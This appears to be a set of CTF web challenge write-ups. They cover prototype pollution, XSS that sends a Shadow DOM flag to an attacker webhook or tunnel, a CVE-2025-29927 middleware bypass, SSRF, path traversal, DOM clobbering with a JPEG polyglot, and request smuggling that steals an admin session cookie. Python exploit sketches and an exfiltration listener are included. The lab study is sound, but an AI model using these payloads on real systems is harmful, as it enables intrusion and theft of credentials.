The flag is in two parts. Express.js web app simulating a server overclocking interface with a CPU multiplier control, benchmark functionality, and a logs endpoint.

URL: https://server-oc.ctf.prgy.in/

Solution

The challenge has two independent flag parts obtained through different vulnerabilities.

Reconnaissance:

  • GET /robots.txt reveals hardware info (CPU: i9-9900K, Motherboard: Asus Z390)

  • GET /script.js reveals the client-side flow: overclock โ†’ benchmark โ†’ leConfig โ†’ logs

  • POST /api/overclock with {"multiplier": 76} is the magic value that enables the benchmark button (showBe: true)

  • POST /leConfig issues a JWT cookie whose payload hints at the /logs endpoint and example payload {"Path": "C:\\Windows\\Log\\systemRestore"}

  • GET /api/benchmark/url returns the SSRF target URL

Flag Part 2 โ€” SSRF endpoint direct access:

The /benchmark endpoint is an SSRF handler that fetches url query param server-side. However, it also checks for an internal query param directly. By passing internal=flag as a query parameter to the outer server (not inside the SSRF URL), the handler returns the second flag part directly:

Flag Part 1 โ€” Prototype pollution on /logs:

The /logs endpoint requires:

  1. A valid session (from POST /api/reset)

  2. Overclock set to multiplier 76 (via POST /api/overclock)

  3. A JWT token cookie (from POST /leConfig)

  4. A JSON body with a Windows path

However, it returns "Invalid user permissions" even with all correct parameters. The bypass is JSON prototype pollution, injecting "__proto__": {"isAdmin": true} into the request body:
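A sketch of the polluted request body (Python's json module treats __proto__ as an ordinary key; the pollution only takes effect when the Node backend merges the parsed object):

```python
import json

# JSON body for POST /logs: a valid Path plus the polluting key
body = json.dumps({
    "Path": "C:\\Windows\\Log\\systemRestore",
    "__proto__": {"isAdmin": True},
})
```

Sent with the session cookie and JWT from the earlier steps, this flips the server's isAdmin check.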

Complete flag: p_ctf{L!qU1d_H3L1um_$h0ulD_N0T_T0uch_$3rv3rs}

("Liquid Helium Should Not Touch Servers", a reference to extreme overclocking with liquid helium cooling)

Shadow Fight

Description

XSS challenge where the flag is hidden inside a closed Shadow DOM. A profile card generator takes name and avatar URL parameters, validates them with an isSafe() blocklist, and renders the name via innerHTML. An admin bot (HeadlessChrome/144) visits submitted profiles via a /review endpoint. The flag is in a closed shadow root on the admin's page:

Solution

Three key obstacles:

  1. XSS with blocklist bypass: isSafe() blocks ", document, window, fetch, location, Function, constructor, prototype, from, char, escape, import, atob, btoa, and more. Name is limited to 50 chars.

  2. Variable scoping in inline handlers: Inline event handlers (onload) have a with(document) scope chain, so avatar resolves to the <input id="avatar"> DOM element instead of the const avatar JS variable.

  3. Closed Shadow DOM extraction: element.shadowRoot returns null for closed shadows, and getInnerHTML() was removed in Chrome 127+.

Bypass strategy:

  • Name field (47 chars): Use <svg/onload=...> with (0,eval)() (indirect eval) to escape the with(document) scope and access the const avatar variable from the global declarative environment:

  • Avatar field: Smuggle the full JS payload in the URL path after https://picsum.photos/1/ (24-char prefix). The domain passes the allowlist check, and avatar.slice(24) extracts the payload at runtime.

  • Shadow DOM extraction: Override Element.prototype.attachShadow with a Proxy to capture shadow root references, then re-execute the shadow DOM creation script via (0,eval)(scriptTag.textContent). Use 'proto'+'type' and 'doc'+'ument' string concatenation to bypass the blocklist.

Full exploit:

How the Proxy trick works:

  1. Element.prototype.attachShadow is wrapped in a Proxy that intercepts apply calls

  2. The proxy captures the returned shadow root reference in _r (works for both open and closed shadows)

  3. The original shadow DOM creation script is found via querySelectorAll('script') and re-executed with (0,eval)()

  4. When the re-executed script calls attachShadow(), the proxy captures the new shadow root

  5. After shadow.innerHTML = '<p>FLAG</p>' runs, _r.innerHTML contains the flag

  6. The flag is exfiltrated via new Image().src to a webhook

Flag: p_ctf{uRi_iz_js_db76a80a938a9ce3}

Note Keeper

Description

A simple note-keeping application built with Next.js 15.1.1. The challenge asks "Can you reach what you're not supposed to?" The app has a guest-facing notes page, a login page, and a middleware-protected admin panel at /admin.

Solution

This challenge involves chaining two vulnerabilities: CVE-2025-29927 (Next.js middleware authorization bypass) and SSRF via Location header injection through NextResponse.next({headers: request.headers}).

Step 1: Reconnaissance

The app is a Next.js 15.1.1 application. The login link contains a base64-encoded state parameter L2FkbWlu = /admin. The /admin route returns 401 with <!--Request Forbidden by Next.js 15.1.1 Middleware-->.

Step 2: Middleware Bypass (CVE-2025-29927)

Next.js 15.1.1 is vulnerable to CVE-2025-29927, which allows bypassing middleware by setting the x-middleware-subrequest header. For Next.js 15.x, the middleware name must be repeated 5 times (recursion depth limit):
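With urllib, the bypass header can be attached like this (a sketch; middleware is the conventional name for a root-level middleware.ts, and src/middleware is the alternative):

```python
import urllib.request

def bypass_request(url: str, middleware_name: str = 'middleware',
                   depth: int = 5) -> urllib.request.Request:
    # CVE-2025-29927: repeating the middleware name up to the recursion
    # limit makes Next.js treat the request as an internal subrequest
    # and skip the middleware entirely
    value = ':'.join([middleware_name] * depth)
    return urllib.request.Request(
        url, headers={'x-middleware-subrequest': value})
```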

This reveals the admin panel with 7 notes containing hints:

  • A pastebin link (https://pastebin.com/GNQ36Hn4) with the middleware source code

  • A base64 string WyIvc3RhdHMiLCAiL25vdGVzIiwgIi9mbGFnIiwgIi8iXQ== decoding to ["/stats", "/notes", "/flag", "/"], the backend API routes

Step 3: Analyzing the Middleware Source

The pastebin reveals the middleware code:

The critical vulnerability: for /api routes, the middleware calls NextResponse.next({headers: request.headers}), passing all incoming request headers into the middleware response.

Step 4: SSRF via Location Header Injection

The admin page's client-side JavaScript reveals the backend runs at http://backend:4000 with a /flag endpoint. This internal service is not directly accessible.

When NextResponse.next() receives headers including a Location header, Next.js interprets it as a server-side redirect and fetches the specified URL internally. By injecting a Location header pointing to the internal backend, we achieve SSRF:

This causes the Next.js server to fetch http://backend:4000/flag and return the response:

Flag: p_ctf{Ju$t_u$e_VITE_e111d821}

Domain Registrar

Description

A domain registrar website with KYC upload functionality. The site runs nginx + PHP/8.2.30 and has endpoints for listing domains (avlbl.php), uploading KYC documents (kyc.php), a flag endpoint (flag.php), and a checkout page with an XSS sink (checkout.html). The /public/ directory exists but returns 403 Forbidden.

Solution

The vulnerability is a path traversal via URL-encoded slash in the /public/ directory route.

Nginx routes requests to /public/ through a PHP handler for image extensions (.png, .jpg, .gif). However, using %2f (URL-encoded /) allows escaping the /public/ directory and traversing back to the webroot:

The key insight is that nginx's location /public/ directive doesn't match /public%2f since the encoded slash isn't decoded at the routing stage, but the backend/filesystem does decode it when resolving the path. This mismatch allows directory traversal out of the /public/ prefix.
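Building such a request path is a one-liner (nginx.conf is used here since that is where the flag turned out to live; the exact traversal target is challenge-specific):

```python
from urllib.parse import quote

# keep "/public/" literal so nginx's location block still matches,
# but encode the traversal slash so only the backend decodes it
traversal = '/public/' + quote('../nginx.conf', safe='')
```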

The flag was stored in a file named nginx.conf in the webroot:

Flag: p_ctf{c@n_nEVer_%ru$T_D0M@!nS_FR0m_p0Ps}

Shadow Fight 2

Description

XSS challenge with a closed Shadow DOM. A "Profile Card Generator" takes name and avatar query parameters. The name is rendered via innerHTML, and there's an admin bot that reviews submitted profiles. The flag is stored in a closed Shadow DOM that's only populated with the real flag when the admin views the page. A server-side filter (isSafe()) blocks dangerous keywords like document, window, fetch, location, Function, constructor, import, from, char, code, escape, %, ", etc. Name is limited to 50 characters.

Solution

Key observations:

  1. The name parameter is reflected directly into a JavaScript string: const name = "VALUE";

  2. While " is blocked (can't break the JS string), </script> is NOT blocked: the HTML parser closes the <script> tag when it encounters </script>, regardless of JS string context

  3. The isSafe() filter runs server-side but doesn't block HTML tags like <script>

  4. No Content-Security-Policy header exists, so external scripts can be loaded

  5. The flag is in the page HTML source (inside a <script> tag that creates the Shadow DOM), readable via document.scripts[].textContent

Attack flow:

  1. Set up an exfiltration server exposed via localhost.run SSH tunnel

  2. Host a JS payload that reads the flag from the DOM and exfiltrates it

  3. Inject </script><script src=//TUNNEL> as the name parameter; this closes the existing script tag and loads our external script

  4. Submit the profile for admin review; the admin bot visits the page, our script executes, reads the flag from the script tag, and sends it to our server

Name parameter (49 chars, under 50 limit):
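The exact 49-character value wasn't preserved; this sketch rebuilds it from the injection described above. `TUNNEL` is a placeholder for whatever hostname localhost.run hands you.

```python
# Rebuilds the name payload and its URL-encoded form; TUNNEL is a
# placeholder tunnel hostname (an assumption, not from the writeup).
from urllib.parse import quote

TUNNEL = "abc123.lhr.life"
payload = f"</script><script src=//{TUNNEL}>"
assert len(payload) <= 50  # the server caps the name at 50 characters

print(len(payload), "?name=" + quote(payload))
```

The protocol-relative `//TUNNEL` saves characters versus a full `https://` URL, which is what keeps the payload under the 50-character limit.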

Exfiltration server (server.py):
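The original `server.py` wasn't included; here is a minimal stand-in that logs any `?flag=...` query it receives, exposed via the localhost.run tunnel (`ssh -R 80:localhost:8000 localhost.run`).

```python
# Minimal exfiltration listener (a sketch, not the writeup's server.py):
# prints the "flag" query parameter of any GET it receives.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        qs = parse_qs(urlparse(self.path).query)
        if "flag" in qs:
            print("[+] flag:", qs["flag"][0])
        self.send_response(200)
        self.end_headers()

def run(port=8000):
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()

# run()  # start the listener before submitting the profile for review
```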

XSS payload (payload.js):

Exploit submission:

Why it works: The </script> injection breaks the existing script context at the HTML parser level; the filter checks for JS-dangerous keywords but doesn't block HTML structural elements. The external script loads without restrictions (no CSP), reads the flag from the DOM (it's in the script tag's text content, not locked inside the Shadow DOM), and exfiltrates it via an Image() request.

Flag: p_ctf{admz_nekki_kekw_c6e194c17f2405c5}

Picture This

Description

A social media platform where users can sign up and create profiles. Only "verified" users get the flag. Profiles are reviewed by automated bots before verification. The goal is to get verified and claim the gift.

Category: web | Points: 425 | Solves: 26

Solution

The application has a three-part vulnerability chain: a MIME type mismatch in the CDN, DOM clobbering to bypass verification logic, and an admin bot that visits user-controlled content.

1. MIME Type Mismatch (.jpg vs .jpeg)

In cdn.js, the content-type defaults to text/html and only overrides for specific extensions:

But in helpers.js, the validateImage function stores JPEG files with .jpg extension:

This means uploaded JPEG files get a .jpg extension, but the CDN serves them as text/html since ".jpg" !== ".jpeg".

2. DOM Clobbering the Verification Check

The admin bot visits /_image/{avatar}?uid={uid}, then injects admin-helper.js which contains:

Note the typo: the default sets adminCanVerify, but the check reads canAdminVerify, which is normally undefined (falsy), forcing rejection. But since our JPEG is served as HTML, we embed a DOM clobbering payload:

This creates window.config (the form element, truthy) and window.config.canAdminVerify (the input element, truthy), bypassing the rejection. CSP is default-src 'self' which blocks inline scripts, but DOM clobbering requires no JavaScript execution.

3. Exploit Flow

  1. Create a minimal valid JPEG (passes file-type magic byte check) with HTML appended after the EOI marker

  2. Upload as avatar; it is stored as uuid.jpg

  3. Request verification; the bot visits /_image/uuid.jpg, which is served as text/html

  4. Browser parses embedded HTML, DOM clobbering sets window.config.canAdminVerify to truthy

  5. admin-helper.js submits action=verify instead of action=reject

  6. User gets verified, flag appears on profile page

Exploit Script (solve.py):
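The original `solve.py` wasn't preserved; below is a sketch of the avatar construction, assuming a bare SOI/APP0/EOI skeleton is enough to pass the magic-byte check. The element names (`config`, `canAdminVerify`) mirror the check in `admin-helper.js`; the JPEG skeleton itself is an assumption.

```python
# Builds the polyglot avatar: JPEG magic bytes up front, DOM clobbering
# HTML appended after the EOI marker.
MINIMAL_JPEG = (
    b"\xff\xd8"                              # SOI marker
    b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00"  # minimal APP0 segment
    b"\x00\x01\x00\x01\x00\x00"
    b"\xff\xd9"                              # EOI marker ends the image data
)

# <form id=config> clobbers window.config; its child input clobbers
# window.config.canAdminVerify. Both are truthy, and no JS runs (CSP-safe).
CLOBBER = b"<form id=config><input name=canAdminVerify></form>"

with open("avatar.jpg", "wb") as f:
    f.write(MINIMAL_JPEG + CLOBBER)
print("wrote avatar.jpg:", len(MINIMAL_JPEG + CLOBBER), "bytes")
```

Uploading `avatar.jpg` and requesting verification then follows the flow above; the browser ignores the binary prefix and parses the trailing HTML once the file is served as `text/html`.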

Flag: p_ctf{i_M!ss#d_Th#_JPG_5f899f05}

Crossing Boundaries

Description

The target is a blog app behind a "front proxy" and a custom caching TCP proxy. The cache proxy caches GET /blogs/<id> responses. The admin bot can be triggered to review a user blog; it then makes a privileged request carrying an admin session cookie. The goal is to obtain /flag.

Solution

The cache proxy has a request-desync bug on cache hits:

  • It checks the cache and, on a HIT, immediately returns the cached response and continues the loop.

  • It does this before reading the request body (Content-Length bytes).

So if we send a cache-hit request:

  1. GET /blogs/<cached> with a Content-Length and a body

  2. The proxy returns the cached blog without consuming the body

  3. The leftover body bytes are parsed as the next HTTP request on the same upstream TCP connection

To steal the admin cookie without relying on "response stealing", we smuggle an incomplete inner request:

  • Outer (carrier) request: GET /blogs/<cached> (cache HIT) with Content-Length: len(inner_bytes)

  • Inner request (parsed by cache proxy as request #2): POST /my-blogs/create with a large Content-Length for its body, but we only send the prefix content=<marker> and stop.

  • The cache proxy blocks waiting for the missing body bytes.

After we "request review" on one of our blogs, the admin bot waits 10s then performs:

  • GET /admin/blogs/<blogID> with Cookie: session=<AdminSessionID> and User-Agent: AdminBot/1.0

Because the front proxy reuses upstream connections and routes the admin bot request into the same isolation bucket, the admin bot's request bytes are consumed as the missing POST body. The backend then stores those bytes as the new blog's content. We fetch that blog and extract the admin session cookie from the captured headers, then call /flag with it.

Exploit code (end-to-end):
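The full exploit wasn't reproduced in this copy; the sketch below rebuilds the desync carrier described above. Host, port, blog id, `marker`, and the 600-byte inner `Content-Length` are placeholders/assumptions; the structure (cache-HIT outer GET whose unread body is an incomplete inner POST) is from the writeup.

```python
# Sketch of the request-desync carrier for the caching proxy bug.
import socket

def build_carrier(cached_id="1", marker="XDESYNCX", inner_len=600):
    # Inner request: deliberately incomplete POST. The proxy blocks waiting
    # for the remaining body bytes, which the admin bot later supplies.
    inner = (
        "POST /my-blogs/create HTTP/1.1\r\n"
        "Host: app\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {inner_len}\r\n"
        "\r\n"
        f"content={marker}"
    ).encode()
    # Outer request: a cache HIT, so the proxy replies without consuming
    # the body; the inner bytes get parsed as the next request.
    outer = (
        f"GET /blogs/{cached_id} HTTP/1.1\r\n"
        "Host: app\r\n"
        f"Content-Length: {len(inner)}\r\n"
        "\r\n"
    ).encode()
    return outer + inner

def fire(host, port=80):
    # After this: trigger "request review", wait >10s, fetch the newest
    # blog, and grep its content for "session=" to recover the admin cookie.
    s = socket.create_connection((host, port))
    s.sendall(build_carrier())
    return s
```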
